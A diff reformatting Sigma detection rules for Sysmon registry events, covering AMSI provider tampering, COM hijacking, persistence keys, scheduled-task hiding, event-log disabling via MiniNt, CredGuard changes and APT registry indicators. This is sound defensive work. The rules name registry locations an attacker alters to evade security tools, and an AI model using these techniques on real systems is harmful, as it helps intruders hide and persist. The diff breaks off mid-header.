https://persistence-info.github.io/Data/amsi.html - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c @@ -20,7 +19,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: - \SOFTWARE\Microsoft\AMSI\Providers\ - \SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\ @@ -31,7 +30,6 @@ detection: - C:\Program Files (x86)\ condition: registry_add and (selection and not filter) falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according - to your environment + - Legitimate security products adding their own AMSI providers. Filter these according to your environment level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml index 9f7527ecf..6e2a4ebce 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml @@ -19,12 +19,14 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey # Don't want DeleteKey events TargetObject|contains|all: - HKU\ - Classes\CLSID\ - \TreatAs filter_svchost: + # Example of target object by svchost + # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs Image: C:\WINDOWS\system32\svchost.exe condition: registry_add and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index 9e8fb46d8..4614f6e70 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Disk Cleanup Handler - Registry id: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a status: test -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence.\nThe disk cleanup manager is part of\ - \ the operating system. It displays the dialog box [\u2026]\nThe user has the\ - \ option of enabling or disabling individual handlers by selecting or clearing\ - \ their check box in the disk cleanup manager's UI.\nAlthough Windows comes with\ - \ a number of disk cleanup handlers, they aren't designed to handle files produced\ - \ by other applications.\nInstead, the disk cleanup manager is designed to be\ - \ flexible and extensible by enabling any developer to implement and register\ - \ their own disk cleanup handler.\nAny developer can extend the available disk\ - \ cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. + The disk cleanup manager is part of the operating system. It displays the dialog box […] + The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ @@ -28,9 +25,10 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ filter: + # Default Keys TargetObject|endswith: - \Active Setup Temp Folders - \BranchCache diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml index 9f8194bee..a1e1e6dc6 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Logon Scripts - Registry id: 9ace0707-b560-49b8-b6ca-5148b42f39fb status: test -description: Detects creation of "UserInitMprLogonScript" registry value which can - be used as a persistence method by malicious actors +description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md author: Tom Ueltschi (@c_APT_ure) @@ -21,11 +20,10 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: UserInitMprLogonScript condition: registry_add and selection falsepositives: - - Investigate the contents of the "UserInitMprLogonScript" value to determine - of the added script is legitimate + - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml index 84ba5afce..fb71e448a 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml @@ -1,8 +1,7 @@ title: PUA - Sysinternal Tool Execution - Registry id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 status: test -description: Detects the execution of a Sysinternals Tool via the creation of the - "accepteula" registry key +description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -20,7 +19,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|endswith: \EulaAccepted condition: registry_add and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml index 62f8ced79..731db8fd1 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml @@ -1,14 +1,12 @@ title: Suspicious Execution Of Renamed Sysinternals Tools - Registry id: f50f3c09-557d-492d-81db-9064a8d4e211 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 8023f872-3f1d-4301-a384-801889917ab4 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 8023f872-3f1d-4301-a384-801889917ab4 + type: similar status: test -description: Detects the creation of the "accepteula" key related to the Sysinternals - tools being created from executables with the wrong name (e.g. a renamed Sysinternals - tool) +description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -26,8 +24,9 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: + # Please add new values while respecting the alphabetical order - \Active Directory Explorer - \Handle - \LiveKd @@ -43,6 +42,7 @@ detection: TargetObject|endswith: \EulaAccepted filter: Image|endswith: + # Please add new values while respecting the alphabetical order - \ADExplorer.exe - \ADExplorer64.exe - \handle.exe diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml index a46a1fe17..8a52b01df 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml @@ -1,14 +1,12 @@ title: PUA - Sysinternals Tools Execution - Registry id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 - type: obsoletes + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: 9841b233-8df8-4ad7-9133-b0b4402a9014 + type: obsoletes status: test -description: Detects the execution of some potentially unwanted tools such as PsExec, - Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" - registry key. +description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Nasreddine Bencherchali (Nextron Systems) @@ -26,7 +24,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: - \Active Directory Explorer - \Handle @@ -37,11 +35,10 @@ detection: - \PsLoglist - \PsPasswd - \SDelete - - \Sysinternals + - \Sysinternals # Global level https://twitter.com/leonzandman/status/1561736801953382400 TargetObject|endswith: \EulaAccepted condition: registry_add and selection falsepositives: - - Legitimate use of SysInternals tools. Filter the legitimate paths used in your - environment + - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml b/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml index 57c096a07..f74fd73fb 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml @@ -1,9 +1,7 @@ title: Folder Removed From Exploit Guard ProtectedFolders List - Registry id: 272e55a4-9e6b-4211-acb6-78f51f0b1b40 status: test -description: Detects the removal of folders from the "ProtectedFolders" list of of - exploit guard. This could indicate an attacker trying to launch an encryption - process or trying to manipulate data inside of the protected folder +description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder references: - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,9 +19,8 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: DeleteValue - TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender - Exploit Guard\Controlled Folder Access\ProtectedFolders + EventType: DeleteValue + TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ProtectedFolders condition: registry_delete and selection falsepositives: - Legitimate administrators removing applications (should always be investigated) diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml b/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml index fa0cb31da..0389359c5 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml @@ -1,8 +1,7 @@ title: Terminal Server Client Connection History Cleared - Registry id: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d status: test -description: Detects the deletion of registry keys containing the MSTSC connection - history +description: Detects the deletion of registry keys containing the MSTSC connection history references: - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - http://woshub.com/how-to-clear-rdp-connections-history/ @@ -23,10 +22,10 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection1: - EventType: DeleteValue + EventType: DeleteValue TargetObject|contains: \Microsoft\Terminal Server Client\Default\MRU selection2: - EventType: DeleteKey + EventType: DeleteKey TargetObject|contains: \Microsoft\Terminal Server Client\Servers\ condition: registry_delete and (1 of selection*) falsepositives: diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml b/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml index f88a033c8..4500232a2 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml @@ -1,8 +1,7 @@ title: Removal Of AMSI Provider Registry Keys id: 41d1058a-aea7-4952-9293-29eaaf516465 status: test -description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. - This technique could be used by an attacker in order to disable AMSI inspection. +description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://seclists.org/fulldisclosure/2020/Mar/45 @@ -21,10 +20,10 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: DeleteKey + EventType: DeleteKey TargetObject|endswith: - - '{2781761E-28E0-4109-99FE-B9D127C57AFE}' - - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' + - '{2781761E-28E0-4109-99FE-B9D127C57AFE}' # IOfficeAntiVirus + - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' # ProtectionManagement.dll condition: registry_delete and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index dc90ce705..28aef90a1 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -1,13 +1,9 @@ title: Removal of Potential COM Hijacking Registry Keys id: 96f697b0-b499-4e5d-9908-a67bec11cdb6 status: test -description: 'Detects any deletion of entries in ".*\shell\open\command" registry - keys. - - These registry keys might have been used for COM hijacking activities by a threat - actor or an attacker and the deletion could indicate steps to remove its tracks. - - ' +description: | + Detects any deletion of entries in ".*\shell\open\command" registry keys. + These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md @@ -29,7 +25,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: DeleteKey + EventType: DeleteKey TargetObject|endswith: \shell\open\command filter_svchost: Image: C:\Windows\system32\svchost.exe @@ -42,9 +38,11 @@ detection: Image: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_dropbox: Image|endswith: \Dropbox.exe + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: \Dropbox. filter_wireshark: Image|endswith: \AppData\Local\Temp\Wireshark_uninstaller.exe + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: \wireshark-capture-file\ filter_opera: Image|startswith: @@ -53,11 +51,14 @@ detection: Image|endswith: \installer.exe filter_peazip: Image|contains: peazip + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: \PeaZip. filter_everything: Image|endswith: \Everything.exe + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: \Everything. filter_uninstallers: + # This image path is linked with different uninstallers when running as admin unfortunately Image|startswith: C:\Windows\Installer\MSI filter_java: Image|startswith: C:\Program Files (x86)\Java\ @@ -65,7 +66,6 @@ detection: TargetObject|contains: \Classes\WOW6432Node\CLSID\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F} condition: registry_delete and (selection and not 1 of filter_*) falsepositives: - - Legitimate software (un)installations are known to cause some false positives. - Please add them as a filter when encountered + - Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml index 835a6dc85..deed103a4 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml @@ -1,14 +1,12 @@ title: Removal Of Index Value to Hide Schedule Task - Registry id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec related: - - id: acd74772-5f88-45c7-956b-6a7b36c294d2 - type: similar - - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61 - type: similar + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + type: similar + - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61 + type: similar status: test -description: Detects when the "index" value of a scheduled task is removed or deleted - from the registry. Which effectively hides it from any tooling such as "schtasks - /query" +description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments author: Nasreddine Bencherchali (Nextron Systems) @@ -26,7 +24,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: DeleteKey + EventType: DeleteKey TargetObject|contains|all: - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ - Index diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml index 75123504a..a639db9af 100644 --- a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml +++ b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml @@ -1,11 +1,10 @@ title: Removal Of SD Value to Hide Schedule Task - Registry id: acd74772-5f88-45c7-956b-6a7b36c294d2 related: - - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec - type: similar + - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec + type: similar status: test -description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry - hive to hide schedule task. This technique is used by Tarrask malware +description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware references: - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ author: Sittikorn S @@ -23,7 +22,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: DeleteKey + EventType: DeleteKey TargetObject|contains|all: - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ - SD diff --git a/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml index 2086db5cc..83bfc8deb 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml @@ -26,8 +26,11 @@ detection: TargetObject|contains: \SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model selection_hkcu: TargetObject|contains: + # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ - Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ + # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\ - Classes\AppX3bbba44c6cae4d9695755183472171e2\ + # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\ - Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\ - Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model selection_appx_1: diff --git a/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml b/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml index d2151d2bf..17f4825df 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml @@ -1,19 +1,17 @@ title: OilRig APT Registry Persistence id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar status: test -description: Detects OilRig registry persistence as reported by Nyotron in their March - 2018 report +description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: diff --git a/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml b/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml index 5f0bec36c..81eec761f 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml @@ -1,9 +1,7 @@ title: UAC Bypass Via Wsreset id: 6ea3bf32-9680-422d-9f50-e90716b12a66 status: test -description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated - with the Windows Store. It will run a binary file contained in a low-privilege - registry. +description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. references: - https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly - https://lolbas-project.github.io/lolbas/Binaries/Wsreset diff --git a/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml index 29b6bddf4..4e250c865 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Registry Event id: b6d235fc-1d38-4b12-adbe-325f06728f37 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman diff --git a/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml b/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml index d18a287e7..5a8151145 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml @@ -1,8 +1,7 @@ title: Disable Security Events Logging Adding Reg Key MiniNt id: 919f2ef0-be2d-4a7a-b635-eb2b41fde044 status: test -description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, - Windows Event Log service will stopped write events. +description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events. references: - https://twitter.com/0gtweet/status/1182516740955226112 author: Ilyas Ochkov, oscd.community @@ -24,9 +23,11 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt - EventType: CreateKey - - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt + EventType: CreateKey # we don't want deletekey + # key rename + - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt condition: registry_event and selection fields: - EventID diff --git a/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml b/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml index d8dcc29b1..9f8496be1 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml @@ -1,15 +1,10 @@ title: Wdigest CredGuard Registry Modification id: 1a2d6c47-75b0-45bd-b133-2c0be75349fd status: test -description: 'Detects potential malicious modification of the property value of IsCredGuardEnabled - from - - HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred - Guard on a system. - +description: | + Detects potential malicious modification of the property value of IsCredGuardEnabled from + HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials. - - ' references: - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml b/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml index 2fd6474e2..e449235ba 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml @@ -1,9 +1,7 @@ title: Esentutl Volume Shadow Copy Service Keys id: 5aad0995-46ab-41bd-a9ff-724f41114971 status: test -description: Detects the volume shadow copy service initialization and processing - via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume - are captured. +description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -25,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|contains: System\CurrentControlSet\Services\VSS - Image|endswith: esentutl.exe + Image|endswith: esentutl.exe # limit esentutl as in references, too many FP to filter filter: TargetObject|contains: System\CurrentControlSet\Services\VSS\Start condition: registry_event and (selection and not filter) diff --git a/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml b/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml index e4ef98a6a..4a7c1dcb5 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml @@ -1,8 +1,7 @@ title: HybridConnectionManager Service Installation - Registry id: ac8866c7-ce44-46fd-8c17-b24acff96ca8 status: test -description: Detects the installation of the Azure Hybrid Connection Manager service - to allow remote code execution from Azure function. +description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. references: - https://twitter.com/Cyb3rWard0g/status/1381642789369286662 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -25,7 +24,7 @@ detection: selection1: TargetObject|contains: \Services\HybridConnectionManager selection2: - EventType: SetValue + EventType: SetValue Details|contains: Microsoft.HybridConnectionManager.Listener.exe condition: registry_event and (selection1 or selection2) falsepositives: diff --git a/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml b/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml index 568aaf352..2817b0303 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml @@ -22,11 +22,11 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject: - - HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A} - - HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027} - - HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303} - - TargetObject|startswith: HKLM\SYSTEM\Setup\PrintResponsor\ + - TargetObject: + - HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A} + - HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027} + - HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303} + - TargetObject|startswith: HKLM\SYSTEM\Setup\PrintResponsor\ condition: registry_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml index a4ef4e8ed..642371623 100644 --- 